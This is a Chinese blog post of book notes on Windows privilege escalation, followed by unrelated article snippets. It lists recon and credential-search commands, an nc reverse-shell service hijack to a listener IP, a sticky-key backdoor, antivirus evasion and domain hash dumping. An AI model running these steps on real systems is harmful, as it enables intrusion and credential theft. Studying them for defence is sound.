网络攻防实战研究 漏洞利用与提权读书笔记二

  • 第2章 Windows漏洞利用与提权
    • 2.1 Windows提权基础
      • 2.1.1 Windows提权信息的收集
      • 2.1.2 Windows提权准备
      • 2.1.3 使用MSF平台搜索可利用的POC
      • 2.1.4 实施提权
      • 2.1.5 停用安全狗
    • 2.2 提权辅助工具Windows-Exploit-Suggester
      • 2.2.1 Windows-Exploit-Suggester简介
      • 2.2.2 下载Windows-Exploit-Suggester、python3.3及xlrd库
      • 2.3 Windows低权限进程及服务提权
      • 2.3.1 AccessChk简介及使用
      • 2.3.2 获取低权限可操作服务的名称
      • 2.3.3 修改服务并获取系统权限
    • 2.4 Windows口令扫描及3389口令暴力破解
      • 2.4.1 口令扫描准备工作
      • 2.4.2 使用NTscan扫描口令
    • 2.5 使用WinlogonHack获取系统密码
    • 2.6 Windows Server 2003 域控服务器密码获取
      • 2.6.1 域控服务器渗透思路
      • 2.6.2 内网域控服务器渗透常见命令
    • 2.7 MS05-039漏洞利用思路总结
      • 2.7.1 MS05-039漏洞简介
    • 2.8 MS08-067远程溢出漏洞利用思路总结
    • 2.9 通过Pr提权某服务器思路总结
      • 2.9.1 分析AWVS扫描结果
      • 2.9.2 获取WebShell
      • 2.9.3 服务器信息收集与Pr提权
    • 2.10 以Public权限渗透某ASP.NET网站思路总结
      • 2.10.1 寻找网站漏洞
      • 2.10.2 获取WebShell
      • 2.10.3 尝试提权
      • 2.10.4 使用lcx命令转发并登录远程桌面
    • 2.11 Windows1/2008服务器64位MS12-042漏洞提权
      • 2.11.1 MS12-042漏洞简介
      • 2.11.2 提权工具
      • 2.11.3 实战提权利用
    • 2.12 对某虚拟主机的一次SiteManager提权
      • 2.12.1 获取虚拟主机某站点的WebShell
      • 2.12.2 使用WebShell中的提权功能尝试提权
      • 2.12.3 查看可写目录
      • 2.12.4 渗透成功
      • 2.12.5 继续渗透内外网
    • 2.13 社工渗透并提权某服务器
      • 2.13.1 网站挂马的检测和清除
      • 2.13.2 入侵痕迹的搜索和整理
      • 2.13.3 利用社会工程学进行反渗透
    • 2.14 通过SQL注入漏洞渗透某服务器并直接提权
      • 2.14.1 对目标站点分析和漏洞利用
      • 2.14.2 尝试提权获取管理员权限
    • 2.15 phpinfo函数信息泄露漏洞的利用与提权
      • 2.15.1 通过phpinfo函数信息泄露漏洞渗透获取WebShell权限
      • 2.15.2
    • 2.16 通过简单的渗透某公司的外部网络
      • 2.16.1 测试页面漏洞的检测
      • 2.16.2 测试页面漏洞的利用思路
      • 2.16.3 登录服务器并进行口令扫描
      • 2.16.4 获取域控密码
      • 2.16.5 测试页面漏洞的修复
    • 2.17 通过文件上传漏洞渗透某Windows 2012服务器并提权
      • 2.17.1 初步渗透
      • 2.17.2 获取WebShell
      • 2.17.3 使用WebShell进行提权并登录服务器
    • 2.18 通过戴尔服务器远程访问管理卡获取服务器权限
      • 2.18.1 获取服务器远程访问管理卡的账号和密码
      • 2.18.2 加载ISO文件
      • 2.18.3 替换文件获取服务器权限

第2章 Windows漏洞利用与提权

2.1 Windows提权基础

2.1.1 Windows提权信息的收集

1.操作系统的名称和版本信息
systeminfo
在这里插入图片描述
2.主机名称和所有环境变量
主机名称:hostname
环境变量:set
在这里插入图片描述
3.查看用户信息
查看用户:net user
在这里插入图片描述
查看管理员用户组:net localgroup administrators
在这里插入图片描述
查看远程终端在线用户:query user
在这里插入图片描述
4.查看远程端口
(1)通过注册表查看
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp/v PortNumber
在这里插入图片描述
(2)通过命令行查看
1.获取对应的PID号:
tasklist /svc
2.通过PID号查找端口
netstat -ano | find “1484”
在这里插入图片描述
5.查看网络情况
(1)网络配置情况:ipconfig /all
在这里插入图片描述
(2)路由器信息:route print

在这里插入图片描述
(3)查看ARP缓存
在这里插入图片描述
(4)查看网络连接
netstat -ano
在这里插入图片描述
(5)查看防火墙规则
netsh firewall show config
在这里插入图片描述
netsh firewall show state

在这里插入图片描述
6.应用程序和服务
查看服务的进程ID:tasklist /svc
查看已安装驱动程序列表:driverquery
在这里插入图片描述
查看已经启动的Windows服务:net start
在这里插入图片描述
查看某服务的启动权限:sc qc apache
在这里插入图片描述
查看已安装程序的列表:wmic product list brief
在这里插入图片描述
查看服务列表:wmic service list brief
在这里插入图片描述
查看进程列表:wmic process list brief
在这里插入图片描述
查看启动程序列表:wmic startup list brief
在这里插入图片描述
搜索可以提升权限的特定漏洞
wmic qfe get Caption,De**ion,HotFixID,InstalledOn | findstr /C:“KBXXXXXXX”
如果执行上面的命令没有输出,意味着那个补丁未安装
wmic process where name=“iexplore.exe” call terminate
7.检索敏感文件
dir /b /s .cod
8.目录文件操作
列出d:\www所有的目录
for /d %i in (d:\www\
) do @echo %i
把当前路径下文件夹名字只有1~3个字母的显示出来
for /d %i in (???) do @echo %i
当前目录及其子目录的全部exe文件列出
for /r %i (*.exe) do @echo %i
把当前目录及其子目录中的所有文件列出
在这里插入图片描述
显示a.txt中的内容
在这里插入图片描述
9.rar打包
rar a -k -r -s -m3 c:\1.rar d:\wwwroot
10.PHP读文件
c:/php/php.exe “c:/www/admin/1.php”
11.注册表搜索关键字
reg query HKLM /f password /t REG_SZ /s
12.系统权限配置
cacls c:
cacls c:\windows\ma.exe

2.1.2 Windows提权准备

使用Windows-Exploit-Suggester获取目前系统中可能存在的漏洞,步骤如下:
1.收集并编译相关POC
2.若操作系统安装了杀毒软件及安全防护软件,则需要对提权POC进行免杀,否则直接进行下一步、
3.上传POC
4.由Webshell或者反弹webshell来执行命令
5.搜索漏洞,根据关键字进行搜索

2.1.3 使用MSF平台搜索可利用的POC

1.在msf中使用search搜索漏洞
2.可自行搜索查看漏洞对应的版本

2.1.4 实施提权

可以使用相关的poc.exe程序进行提权

2.1.5 停用安全狗

在这里插入图片描述

2.2 提权辅助工具Windows-Exploit-Suggester

2.2.1 Windows-Exploit-Suggester简介

Windows-Exploit-Suggester,用python开发而成,运行环境是python3.3及以上版本,且必须安装xlrd库,主要功能是通过比对systeminfo生成的文件发现系统是否存在未修复的漏洞。

2.2.2 下载Windows-Exploit-Suggester、python3.3及xlrd库

1.下载Windows-Exploit-Suggester
Windows-Exploit-Suggester下载地址:
Windows-Exploit-Suggester.py
在这里xlrd库需要源码安装,使用pip安装在调用程序时会报错
2.下载漏洞库
运行命令:
Windows-Exploit-Suggester --update
在这里插入图片描述
3.生成系统信息文件
systeminfo > win10-systeminfo.txt
在这里插入图片描述
4.查看系统漏洞
windows-exploit-suggester.py --database 2019-08-20-mssb.xls --systeminfo win10-systeminfo.txt(win10)
在这里插入图片描述
windows-exploit-suggester.py --database 2019-08-20-mssb.xls --systeminfo win7-systeminfo.txt(win7)
在这里插入图片描述

2.3 Windows低权限进程及服务提权

其原理主要通过微软的AccessChk工具软件配合SC来操作服务服务,通过服务的重启而得到权限。

2.3.1 AccessChk简介及使用

1.AccessChk简介
主要用来检查用户和用户组队文件、目录、注册表项、全局对象和系统服务的权限情况,在实际配置过程中如果权限设置失误,就可能被提权。
2.AccessChk参数
-a:Windows账户权限
-c:显示服务名称
-d:仅处理目录或顶级键
-e:只显示设置的完整性级别
-f:显示包含组合特权的完整过程令牌信息
-k:注册表键值
-I:在取消完全访问控制列表时忽略只继承符的对象
-l:显示全部访问列表
-n:仅显示没有访问权限的对象
-o:名称是对象管理器命名空间中的一个对象
-p:进程名或者PID
-q:省略标识
-r:显示对象只读属性
-s:递归
-t:对象类型赛选器
-u:抑制错误
-v:冗长
-w:仅显示具有写访问权限的对象

2.3.2 获取低权限可操作服务的名称

1.实验环境
本次实验环境为win20003,用户simeon属于Power User组,可登陆系统,IP地址为192.168.253.131.监听服务IP地址为192.168.253.132。将nc.exe复制到c:\windows\temp目录下
2.获取可读可写的服务
accesschk.exe -uwcqv “Power Users” *
在这里插入图片描述
3.查询服务详细信息
名称为"DcomLaunch"、"kdc"的服务可以被simeon用户操作。使用"sc qc kdc"命令查询kdc服务的详细信息.
在这里插入图片描述4.确定使用的服务
net start | find “…”
5.获取服务名称对应的服务
tasklist /svc

2.3.3 修改服务并获取系统权限

1.修改DcomLaunch服务参数binpath的值
sc config DcomLaunch binpath= “C:\WINDOWS\temp\nc.exe -nv 192.168.253.139 4433 -e C:\WINDOWS\System32\cmd.exe”
在这里插入图片描述
执行命令成功后,再次使用sc qc DcomLaunch命令查看服务
在这里插入图片描述
2.重新启动服务
先执行sc config DcomLaunch obj= “.\LocalSystem” password= ""命令,后执行net start DcomLaunch命令
在这里插入图片描述
3.反弹获取服务器权限
在反弹服务器192.168.253.132中监听4433端口,成功获取来自192.168.253.131的反弹,且为系统权限
在这里插入图片描述
注:在这里靶机我使用的是administrator用户,simeon用户操作无法成功。

2.4 Windows口令扫描及3389口令暴力破解

2.4.1 口令扫描准备工作

收集的信息越多,越有可能成功获取内网服务器权限。例如,在掌握一定的权限后,通过邮箱账号等信息进行社工密码收集,对用户的密码进行规律分析和社工字典生成。
(1)确定需要扫描的IP地址或者IP地址段
(2)收集用户名和密码
(3)编辑密码和口令配置文件

2.4.2 使用NTscan扫描口令

1.设置NTscan
设置好用户名和密码
2.执行扫描
在这里插入图片描述
3.实施控制(获取主机的管理员权限)
在这里插入图片描述
4.使用psexec工具,执行psexec命令
在这里插入图片描述

2.5 使用WinlogonHack获取系统密码

2.6 Windows Server 2003 域控服务器密码获取

2.6.1 域控服务器渗透思路

(1)寻找网络入口,获取域控用户权限,通过用户获取域控管理员信息
(2)获取域控服务器内某一台Web服务器或者其他服务器的权限

2.6.2 内网域控服务器渗透常见命令

1.本机信息收集命令
用户列表:分析Windows用户列表,一定不要忽略administrator
分析邮件用户,内网/域邮件用户通常就是内网/域用户
进程列表:分析杀毒软件/安全监控工具、邮件客户端、VPN等
服务列表:与安全防范工具有关的服务(判断是否可以手动开关等),存在问题的服务(权限/漏洞)
端口列表:开放端口对应的常见服务/应用陈旭(匿名/权限/漏洞等),利用端口进行信息收集,建议深入挖掘(NETBIOS、SMB等)
补丁列表:分析Windows补丁、第三方软件(Java/Oracle/Flash等)的漏洞
本机共享(域内共享在很多时候是相同的):本机共享列表/访问权限,本机访问的域共享/访问权限
本地用户习惯分析:历史记录、收藏夹、文档等,特别是远程终端、PUTTY、FTP及SSH等
2.常见信息收集命令
查询本机用户列表:net user
查询本机管理员(通常含有域用户):net localgroup administrators
查询域管理用户:net group “domain admins” /domain
查询域用户:net user /domain
查询域里面的工作组:net group /domain
查询域名称:net view /domain
查询域内计算机:net time /domain
查询域管理员用户组:net localgroup administrators /domain
将域用户添加到本机:net localgroup administrators workgroup\user001 /add
查看域控制器(如果有多台):net group “Domain controllers”
查询本机IP段、所在域等:ipconfig /all
查询同一域内的机器列表:net view
查询所有域控制器:dsquery server
查询域内计算机:dsquery computer
查询域用户:dsquery user
查询域内联系人:dsquery contact
查询域内子网:dsquery subnet
查询域内用户组:dsquery group
查询域内组织单位:dsquery ou
查询域内站点:dsquery site
查询域内所有计算机:net group “domain computers” /domain

2.7 MS05-039漏洞利用思路总结

2.7.1 MS05-039漏洞简介

1.MS05-039漏洞
Windows的即插即用(PnP)功能允许操作系统在安装新硬件时检测这些设备。由于该功能中存在缓冲区溢出漏洞,因此成功利用这个漏洞的攻击者可以完全控制受影响的系统。
2.利用步骤:
(1)设置MS05-039漏洞利用程序
(2)扫描存在MS05-039漏洞的计算机
当扫描到存在溢出漏洞的计算机后,会反弹一个独立IP地址的DOSShell并以Telnet的方式显示
(3)查看扫描结果
查看有哪些被扫描的计算机
(4)实时控制
在DOSShell中使用vbs脚本下载Radmin的3个程序r_server.exe、raddrv.dll、admdrv.dll
(5)在DOS环境下安装Radmin
执行相关命令
(6)远程连接Radmin

2.8 MS08-067远程溢出漏洞利用思路总结

1.扫描445端口
2.使用MS08-067溢出工具对结果进行溢出尝试
一个MS08-067.exe的程序
3.监听4444端口(端口在MS08-067.exe源程序中定制)
在执行扫描的计算机上使用nc监听4444端口
4.继续进行溢出(选择其他ip)
换一个IP地址执行溢出
5.查看服务器信息(判断是否对其进行后续控制)
6.添加管理员账号
7.上传文件
有很多种方式
8.获取系统详细信息及执行各种命令
9.登录被溢出的服务器
10.加固服务器
11.破解Hash值

2.9 通过Pr提权某服务器思路总结

2.9.1 分析AWVS扫描结果

2.9.2 获取WebShell

1.获取文件上传地址
通过AWS,发现网站存在直接文件上传地址
2.直接上传网页木马
3.创建并操作一句话后门
4.上传大马进行管理

2.9.3 服务器信息收集与Pr提权

1.查看网站服务器文件(例如数据库文件)
2.查询目标网站所在服务器下的所有域名
3.分析数据库文件(可以获取FTP用户名、FTP密码)
4.上传PHP WebShell(通过账号和密码登录该FTP服务器,并上传webshell)
5.Pr提权
6.获取远程终端端口
7.登录远程终端端口

2.10 以Public权限渗透某ASP.NET网站思路总结

2.10.1 寻找网站漏洞

	1.找到sql注入点并注入成功2.扫描和获取后台地址3.登录后台

2.10.2 获取WebShell

2.10.3 尝试提权

2.10.4 使用lcx命令转发并登录远程桌面

1.查看添加的用户
2.使用lcx命令进行端口转发
3.连接远程桌面

2.11 Windows1/2008服务器64位MS12-042漏洞提权

2.11.1 MS12-042漏洞简介

Windows User Mode Scheduler在处理系统请求时存在权限提升漏洞,成功利用后可导致在内核模式中运行任意代码。

2.11.2 提权工具

MS12-042提权工具被编译成sysret.exe,其部分参数如下L
sysret -p:表示把此时的进程提升到system权限
sysret -e:表示把程序提升到system权限运行

2.11.3 实战提权利用

1.提权服务器信息收集与分析
(1)收集系统版本信息
(2)使用systeminfo命令获取补丁及操作系统信息
(3)查看当前用户权限
2.实施提权

2.12 对某虚拟主机的一次SiteManager提权

2.12.1 获取虚拟主机某站点的WebShell

2.12.2 使用WebShell中的提权功能尝试提权

2.12.3 查看可写目录

2.12.4 渗透成功

1.找到明文管理员密码
2.查看远程终端端口
3.进入系统

2.12.5 继续渗透内外网

1.获取系统口令
2.探测相同网段具有该端口的远程终端IP地址
3.使用获取的用户账号和密码登录
4.启用内外网卡

2.13 社工渗透并提权某服务器

2.13.1 网站挂马的检测和清除

1.使用软件嗅探被挂马的页面
2.清除挂马代码

2.13.2 入侵痕迹的搜索和整理

检测到入侵主机的ip,扫描该端口,发刊开放了3389端口、80端口、FTP服务

2.13.3 利用社会工程学进行反渗透

1.使用获取的FTP账号猜测服务器登录口令
2.从网站入手
3.从FTP目录入手
4.上传ASP.NET木马提升系统权限
上传的ASPX木马能执行命令了
5.获取数据库用户管理员密码
猜测的3389端口的密码不对,可能和数据库账户密码一致,所以从FTP下载这个数据库文件
6.再次登录远程终端
利用数据库的账户和密码登录远程终端

2.14 通过SQL注入漏洞渗透某服务器并直接提权

2.14.1 对目标站点分析和漏洞利用

获取Webshell

2.14.2 尝试提权获取管理员权限

1.使用"中国菜刀"连接
2.上传GetPass获取账户和密码
3.查看开放的端口
4.查看内网的情况
5.尝试内网渗透并查看权限

2.15 phpinfo函数信息泄露漏洞的利用与提权

2.15.1 通过phpinfo函数信息泄露漏洞渗透获取WebShell权限

1.分析phpinfo函数暴露出来的有用信息
(1)操作系统
(2)服务器
(3)网站默认路径
3.查看泄露的文件
对根目录进行访问
3.获取数据库口令
利用泄露的文件,获取口令
4.连接并查看数据库
5.导出一句话后门到服务器
6.获取WebShell

2.15.2

1.对服务器进行提权
2.登录3389端口

2.16 通过简单的渗透某公司的外部网络

2.16.1 测试页面漏洞的检测

找到baidu.zip备份及mszw.sql数据库文件泄露

2.16.2 测试页面漏洞的利用思路

1.扫描端口
2.反查IP地址所在域名
3.对端口进行测试
4.对存在的漏洞进行利用
5.获取WebShell
6.获取服务器密码

2.16.3 登录服务器并进行口令扫描

使用lcx进行内网渗透。在外网独立服务器上尝试连接和登录,成功登录该服务器。
将获取的口令放入NTscan的扫描字典中。

2.16.4 获取域控密码

使用gsedump程序直接获取该域控服务器所有密码的列表

2.16.5 测试页面漏洞的修复

该漏洞的修复方法就是删除测试页面。

2.17 通过文件上传漏洞渗透某Windows 2012服务器并提权

2.17.1 初步渗透

1.对目标端口进行扫描
2.在浏览器中对该IP地址进行访问
3.对存在的Web目录逐个进行访问测试
4.后台绕过漏洞
上传一个一句话后门PHP文件上传

2.17.2 获取WebShell

1.寻找WebShell地址
2.收集和查看服务器上的敏感信息
3.获取数据库root账号密码
获取数据库root账号和密码的目的是在无法提权的情况下尝试进行Mysql数据库提权

2.17.3 使用WebShell进行提权并登录服务器

1.使用 WebShell进行提权
2.登录远程终端

2.18 通过戴尔服务器远程访问管理卡获取服务器权限

2.18.1 获取服务器远程访问管理卡的账号和密码

1.登录系统
戴尔服务器远程访问管理卡是在紧急情况下(例如宕机)辅助管理服务器的管理工具。
2.使用虚拟控制台
3.操控操作系统

2.18.2 加载ISO文件

1.加载ISO文件
2.启用虚拟介质
3.选择DOS工具集
4.使用DOS工具箱
提供了访问NTFS分区的功能
5.访问磁盘分区
可以直接查看目标所在的网站程序等信息

2.18.3 替换文件获取服务器权限

1.通过替换放大镜(osk.exe)或sethc.exe等获取Webshell
del osk.exe
dir osk.exe
copy cmd.exe osk.exe
2.重启系统获取系统权限

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. shiro教程9(session和remember me)

    sessionshiro提供的session不依赖web容器,可以直接使用,如果是在web环境下,session中的数据和httpsession中的数据是通的。Shiro中的session可以出现在任何地方,例如service、dao等,不需要从controller中传递session参数,用户保存在session中的数据可以在HTTP session中获…...

    2024/4/20 15:48:39
  2. 十六进制转换十进制算法

    比如说。我这边需要换算 16进制 的 12 十六进制已开头 0x 表示 计算机表达 0x12 ^表示次方 计算公式: 拆分数字 * 16 ^ (数字位置-1) 如何进行去换算。 单独把 12 拎出来 12 的十六进制= 1*16^1 + 2*16^0 = 16 + 2 = 18...

    2024/4/14 22:36:53
  3. win7升级win10方法

    第一种: 下载win10镜像,通过U盘进行安装系统,此方法适合比较懂的人进行操作。第二种: 通过命令让微软进行推送安装win10,只需要点击确认即可。删除“C:\Windows\SoftwareDistribution\Download”下所有文件按Win+R组合键打开“运行”输入 wuauclt.exe /updatenow 后回车(…...

    2024/4/18 1:52:49
  4. 密码安全攻防技术精讲

    课程介绍本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。非技术专业读…...

    2024/5/6 9:27:29
  5. android配置时间服务器+亚洲主要的授时服务器

    http://blog.csdn.net/u010725171/article/details/48541915我们知道,Android是通过连接指定的ntpServer来获取网络时间,而不同的服务器带来的延迟也不尽相同,通常情况下,我们自然是期望尽快获取时间,那么我们就需要对ntpServer有一定的筛选,尤其是在选择默认的ntpServer…...

    2024/4/20 13:56:18
  6. 2017.4.12 开涛shiro教程-第十八章-并发登录人数控制

    原博客地址:http://jinnianshilongnian.iteye.com/blog/2018398 根据下载的pdf学习。开涛shiro教程-第十八章-并发登录人数控制 shiro中没有提供默认实现,不过可以很容易实现。通过shiro filter机制拓展KickoutSessionControllerFilter。 kickoutSessionControllerFilter -&…...

    2024/5/6 15:32:04
  7. vb.net 有符号16进制转10进制

    Private Sub Command1_Click()整型是两字节16位的,长整是四字节32位的与十六进制转换要与底层二进制换算,瞎用强制转换,当然不会有正确的结果。以下程序如看不懂,请继续修炼基础知识。Debug.Print Hex(-600)Debug.Print CInt("&H" & Hex(-600))Debug.Pri…...

    2024/5/6 10:49:26
  8. [网络安全自学篇] 四十三.木马原理详解、远程服务器IPC$漏洞及木马植入实验

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞。本文将详细讲解木马原理知识,并通过远程服务器…...

    2024/4/20 4:28:26
  9. win7纯净版64位系统下载

    win7纯净版64位系统大家想必都不陌生了,因为这款系统拥有着稳定、兼容性高的性质,导致它已经成为了大家重装系统的首选之作。那么这款系统到底要去哪里下载呢?下面博主就给大家分享一下win7纯净版64位系统下载吧。●windows7系统之家作品简述:《系统之家ghost win7 x64 旗舰…...

    2024/5/6 8:30:21
  10. 图像处理之其他杂项(三)之cvSnakeImage改进升级兼容 适用于opencv2,,在opencv3.0以上版本中测试通过

    cvSnakeImage改进升级兼容cvSnakeImage函数在opencv2中已经被去掉,现在函数仅有C接口版本,把函数源代码作为独立函数整合进程序中,并对其中包含的opencv2中不存在的函数宏定义进行更改替换,适合opencv2环境使用,测试环境VS2015+opencv3.2。原源代码:蚂蚁搬家 http://blo…...

    2024/4/14 22:02:34
  11. 设置操作系统时间与互联网服务器同步

    在安装操作系统后,系统的时间往往是不准确的,这是因为在系统启动时,会以系统的硬件时间作为基础时间,而系统的硬件时间往往与当前时间不一致,所以装完系统后,一个首要任务是修改系统时间。但如果自己手动修改系统时间,秒数很难精确,只能准确到分钟,所以不建议直接手动…...

    2024/4/14 22:36:47
  12. Spring之shiro使用教程

    Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。谈及shiro必然少不了一张图和三个关键词语:Subject, SecurityManager 和 Realms。简单来说可以总结为:Subject:用户提交的请求 SecurityManager:shiro核心代码 Realms:shrio沟通数据库和缓存的…...

    2024/4/14 22:36:46
  13. 网络游戏服务器架构

    网络游戏一般采用C/S结构,客户端负责绘制游戏世界的实时画面,服务器端则负责响应所有客户端的连接请求和游戏逻辑处理,并控制所有客户端的画面绘制,客户端与服务器通过网络数据包交互完成每一步游戏逻辑。 网关服务器方式,主要职责是将客户端通信和游戏服务器隔离。 网关服…...

    2024/4/25 20:52:06
  14. java实现蛇形算法

    package aglo;public class test {/*** 描述一:* 5行5列蛇形算法* (0,0)(4,4)-第1行和倒数1行相差4* (1,0)(4,3)(0,1)(3,4)-第2行和倒数2行相差3* (0,2)(2,4)(1,1)(3,3)(2,0)(4,2)-第3行和倒数3行相差2* (3,0)(4,1)(2,1)(3,2)(1,2)(2,3)(0,3)(1,4)-第4行和倒数4行相差1* 第5行为…...

    2024/5/4 14:31:31
  15. Shiro使用教程

    一、什么是Shiro Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能: 认证 - 用户身份识别,常被称为用户“登录”;授权 - 访问控制;密码加密 - 保护或隐藏数据防止被偷窥;会话管理 - 每用户相关的时间敏感的状态。 对于任何一个…...

    2024/4/18 23:59:41
  16. 进制转换:二进制、八进制、十六进制、十进制之间的转换

    进制转换:二进制、八进制、十六进制、十进制之间的转换不同进制之间的转换在编程中经常会用到,尤其是C语言。将二进制、八进制、十六进制转换为十进制二进制、八进制和十六进制向十进制转换都非常容易,就是“按权相加”。所谓“权”,也即“位权”。假设当前数字是N进制,那…...

    2024/4/14 22:36:42
  17. WIN7封装超详细图文教程+封装工具包+素材包

    一、 准备工作1、虚拟机2、DiskGenius3、母盘(ZS规则Windows 7 SP1旗舰版V5)4、封装工具ES3_Final5、IT天空万能驱动包6、WinPE iso文件7、常用软件安装器8、常用运行支持库9、优化工具10、图片包(封装背景、桌面背景、OEM信息)11、WIN7补丁包(可选)上面软件除(可选)之…...

    2024/4/24 15:07:25
  18. 黑客技术提高

    一.远程口令猜解流行与常用的工具包括Legion,enum,SMBGrind,NTScan.国内比较流行XScan远程桌面 3389 端口常用猜解TSGrinder,Brutik,Fast RDP Brute,DUBruteMS SQL 1433端口 1434 端口 使用sqlbf,Auto-SQLCain and Abel 是目前功能最为全面的口令破解工具,支持FTP,HTTP,POP,SMT…...

    2024/4/20 12:12:43
  19. ***内网windows xp的几种思路和方法

    如何***内网windows xp的几种思路和方法简单的方法无非就是弱口令了 方法1.弱口令 用到的工具 ntscan ,recton,*** 可惜扫了一下一个弱口令都没有!再用superscan 扫了一下port ,发现7台电脑在线,只有三台没开防火墙,而且只开了137 netbios ,123 ntp等端口 只好放弃此方法 方…...

    2024/4/20 11:58:11
  20. 常用的时间同步服务器地址

    转载出处http://www.minunix.com/2013/03/ntpserver/ 感谢原作者,一切的权利都属于原作者,如果有所不适,我会立即删除 中国大概能用的NTP时间服务器地址 server 133.100.11.8 preferserver 210.72.145.44server 203.117.180.36server 131.107.1.10server time.asia.apple.co…...

    2024/4/14 22:36:38

最新文章

  1. PostgreSQL自带的命令行工具10- pg_basebackup

    PostgreSQL自带的命令行工具10- pg_basebackupbash 基础信息 OS版本:Red Hat Enterprise Linux Server release 7.9 (Maipo) DB版本:16.2 pg软件目录:/home/pg16/soft pg数据目录:/home/pg16/data 端口:5777pg_baseba…...

    2024/5/6 18:33:48
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/6 9:38:23
  3. app上架-您的应用存在最近任务列表隐藏风险活动的行为,不符合华为应用市场审核标准。

    上架提示 您的应用存在最近任务列表隐藏风险活动的行为,不符合华为应用市场审核标准。 修改建议:请参考测试结果进行修改。 请参考《审核指南》第2.19相关审核要求:https://developer.huawei.com/consumer/cn/doc/app/50104-02 造成原因 …...

    2024/5/5 6:14:32
  4. Oracle 正则表达式

    一、Oracle 正则表达式相关函数 (1) regexp_like :同 like 功能相似(模糊 匹配) (2) regexp_instr :同 instr 功能相似(返回字符所在 下标) (3) regexp_substr : 同 substr 功能相似&…...

    2024/5/5 8:52:36
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/4 23:54:56
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/4 23:54:56
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/6 9:21:00
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/4 23:55:16
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

